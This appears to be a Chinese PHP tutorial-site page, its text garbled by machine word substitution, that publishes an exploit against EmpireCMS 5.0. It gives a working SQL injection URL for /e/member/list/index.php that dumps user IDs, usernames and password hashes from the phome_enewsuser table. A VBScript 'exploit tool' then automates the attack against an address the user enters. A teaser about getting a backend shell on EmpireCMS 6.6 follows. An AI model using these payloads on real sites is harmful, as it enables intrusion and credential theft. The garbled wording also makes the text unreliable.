php专区

 首页 > php专区 > PHP应用 > CMS建站 > 3860:帝国CMS5.0“/e/member/list/index.php”文件打针裂痕

3860:帝国CMS5.0“/e/member/list/index.php”文件打针裂痕

分享到:
【字体:
导读:
          /e/member/list/index.php?sear=1totalnum=1keyboard=%D9+union+select+1,1,1,concat(char (123),userid,char(95),username,char(95),password,char(125))+from+phome_enewsuser /* VBS操作措施 代码如下: DIM a,i,e,b,ie,cmd5 i=InputBox (输入方针...

/e/member/list/index.php?sear=1&totalnum=1&keyboard=%D9'+union+select+1,1,1,concat(char (123),userid,char(95),username,char(95),password,char(125))+from+phome_enewsuser /* VBS操作措施 代码如下: DIM a,i,e,b,ie,cmd5 i=InputBox ("输入方针地点 名目","帝国CMS 0DAY操作措施 BY Nuke") If i="" Then msgbox "请输入地点" WScript.Quit End If b=InputBox ("输入表名默以为phome_enewsuser","帝国CMS 0DAY操作措施 BY Nuke","phome_enewsuser") If b="" Then msgbox "请输入表名" WScript.Quit End If e = "/e/member/list/index.php?sear=1&totalnum=1&keyboard=%D9'+union+select+1,1,1,concat(char(123),userid,char(95),username,char(95),password,char(125))+from+" & b & "/*" ie = i & e Set a=WScript.CreateObject("InternetExplorer.Application") a.visible=True a.navigate ie msgbox "32位的MD5祝你好运!"

 
分享到:
帝国cms 6.6版本曝裂痕可拿靠山Shell
披露状态: 2013-01-21: 起劲接洽厂商而且守候厂商认领中,细节差池外果真 2013-01-21: 厂商已经主动忽略裂痕,细节向公家果真 扼要描写: cms 6.6版本靠山拿shell 比网优势行的要领简朴许多 因为 提交模版未过滤题目 导致的 具体声名: 靠山-模版-民众模版-js挪用登岸模版 此处成果为修改js挪用...
帝国CMS调用网站关键字+描述的方法
帝国CMS_调用网站关键字+描述的方法 调用网站关键字: 调用网站描叙: 帝国CMS调用网站标题的方法 帝国CMS_调用网站标题的方法 方法1: [!--pagetitle--] 方法2:  
  •         php迷,一个php技术的分享社区,专属您自己的技术摘抄本、收藏夹。
  • 在这里……